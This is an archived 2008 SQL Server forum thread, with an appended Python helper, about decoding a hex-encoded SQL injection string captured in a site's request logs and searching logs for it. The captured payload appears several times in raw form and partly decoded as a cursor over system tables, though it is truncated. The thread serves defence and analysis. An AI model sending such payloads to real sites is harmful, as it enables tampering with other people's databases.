sql injection gibberish

shank posted on Monday, July 14, 2008 8:49 AM

I'm finally winning against the script injection attacks.

How can I convert the below gibberish into code I can understand?
I'd like to know what they are throwin' at me.

title=A&bt=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C40432056415
2434841522832353529204445434C415245205461626C655F437572736F7220
435552534F5220464F522053454C45435420612E6E616D652C622E6E616D6520
46524F4D207379736F626A6563747320612C737973636F6C756D6E7320622057
4845524520612E69643D622E696420414E4420612E78747970653D27752720414
E442028622E78747970653D3939204F5220622E78747970653D3335204F52206...

thanks

Plamen Ratchev posted on Monday, July 14, 2008 10:24 AM

Take a look at the following article, it explains in details this type of
SQL injection attack:
http://blogs.technet.com/neilcar/archive/2008/03/15/anatomy-of-a-sql-injection-incident-part-2-meat.aspx

HTH,

Plamen Ratchev
http://www.SQLStudio.com

Mike C# posted on Monday, July 14, 2008 2:44 PM

FWIW here's a translation of what you posted:

DECLARE @S VARCHAR(4000);SET @S='DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects
a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35
OR ...

Hackers + Dynamic SQL + Cursors ==> Wow.  The best of all possible worlds.

--

========
Michael Coles
http://www.amazon.com/Pro-SQL-Server-2008-XML/dp/1590599837/

shank posted on Monday, July 14, 2008 5:33 PM

OK... much appreciated... but how did you translate?
thanks

Michael Coles posted on Tuesday, July 15, 2008 1:15 AM

I just did a SELECT CAST(<insert binary string here> AS VARCHAR(MAX)).  You
were probably getting gibberish if you were trying to convert the exact
string you posted since it has an odd number of characters.  Delete the 6
from the end and try again.

--

========
Michael Coles
http://www.amazon.com/Pro-SQL-Server-2008-XML/dp/1590599837/

SQL Menace posted on Tuesday, July 15, 2008 8:18 PM

Take a look here
http://sqlblog.com/blogs/denis_gobo/archive/2008/06/25/7491.aspx


Denis The SQL Menace
http://www.lessthandot.com/
http://sqlservercode.blogspot.com
http://sqlblog.com/blogs/denis_gobo/default.aspx



Eric Isaacs posted on Tuesday, July 15, 2008 8:18 PM

You could try...

PRINT CAST(0x4445434C415245204054205641524348415228323535292C40432056415
2434841522832353529204445434C415245205461626C655F437572736F7220
435552534F5220464F522053454C45435420612E6E616D652C622E6E616D6520
46524F4D207379736F626A6563747320612C737973636F6C756D6E7320622057
4845524520612E69643D622E696420414E4420612E78747970653D27752720414
E442028622E78747970653D3939204F5220622E78747970653D3335204F52206...

AS VARCHAR(8000))

...to see what it converts to in VARCHAR.

-Eric Isaacs

shank posted on Thursday, July 17, 2008 9:52 PM

I used your sample below to decode.

How can I encode the following: 

So I can make it easier to find the entry in the logs? They're hittin' my
server through a dozen sites all day long. I've got them down to 95%
failures. But I still get that one that gets through and I need to find
which page is being assaulted. It would be easier if I could search for the
exact encoded characters.

thanks
================================

You could try...

PRINT CAST(0x4445434C415245204054205641524348415228323535292C40432056415
2434841522832353529204445434C415245205461626C655F437572736F7220
435552534F5220464F522053454C45435420612E6E616D652C622E6E616D6520
46524F4D207379736F626A6563747320612C737973636F6C756D6E7320622057
4845524520612E69643D622E696420414E4420612E78747970653D27752720414
E442028622E78747970653D3939204F5220622E78747970653D3335204F52206...

AS VARCHAR(8000))

...to see what it converts to in VARCHAR.

-Eric Isaacs

Eric Isaacs posted on Saturday, July 19, 2008 1:10 AM

SELECT CAST('' AS VARBINARY)

You could also convert/cast the binary to string and search that
result for it as well.

Make sure that the infected fields aren't truncated too.  Some of
these SQL injection attacks truncated data when they appended the
scripts.  So you may have lost data as well, and removing the scripts
won't fix everything.  A DB backup may be the only way to fix some of
them.

-Eric Isaacs
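An added example, not posted by anyone in this thread, that does outside the database what Michael Coles's CAST(... AS VARCHAR) and Eric Isaacs's CAST(... AS VARBINARY) do in T-SQL: it pulls the 0x literal out of the query string shank posted and decodes it (dropping the dangling nibble of the odd-length, truncated hex, as Michael advised), and it encodes a known fragment back into the same hex form so the exact bytes can be searched for in web server logs. The sample query string is constructed from the thread's own truncated payload, and the function names are this example's own.

```python
import re
from urllib.parse import unquote

# Constructed test input: the query string from the first post, with the hex
# payload exactly as it appears in the thread (truncated, odd digit count).
SAMPLE_QUERY = (
    "title=A&bt=1;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x"
    "4445434C415245204054205641524348415228323535292C40432056415"
    "2434841522832353529204445434C415245205461626C655F437572736F7220"
    "435552534F5220464F522053454C45435420612E6E616D652C622E6E616D6520"
    "46524F4D207379736F626A6563747320612C737973636F6C756D6E7320622057"
    "4845524520612E69643D622E696420414E4420612E78747970653D27752720414"
    "E442028622E78747970653D3939204F5220622E78747970653D3335204F52206"
)

# A T-SQL binary literal: 0x followed by hex digits.
HEX_LITERAL = re.compile(r"0x([0-9A-Fa-f]+)")


def decode_hex_literal(hex_digits):
    """Decode the digits of a 0x... literal as CAST(... AS VARCHAR) would.

    An odd number of digits (a log line or post cut off mid-byte) cannot
    form whole bytes, so the trailing nibble is dropped first.
    """
    if len(hex_digits) % 2:
        hex_digits = hex_digits[:-1]
    # These payloads are plain ASCII; substitute rather than fail on other bytes.
    return bytes.fromhex(hex_digits).decode("ascii", errors="replace")


def decode_request(query_string):
    """Return every decoded 0x... literal found in a URL-encoded request."""
    plain = unquote(query_string)  # turns %20 back into spaces, etc.
    return [decode_hex_literal(m) for m in HEX_LITERAL.findall(plain)]


def encode_for_log_search(text):
    """Hex-encode a known fragment (e.g. the injected cursor declaration) in
    the form CAST(0x...) carries it, so logs can be searched for those bytes.
    Logs may hold either case, so compare case-insensitively when grepping."""
    return "0x" + text.encode("ascii").hex().upper()


if __name__ == "__main__":
    for statement in decode_request(SAMPLE_QUERY):
        print(statement)
    print(encode_for_log_search("DECLARE Table_Cursor CURSOR FOR"))
```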

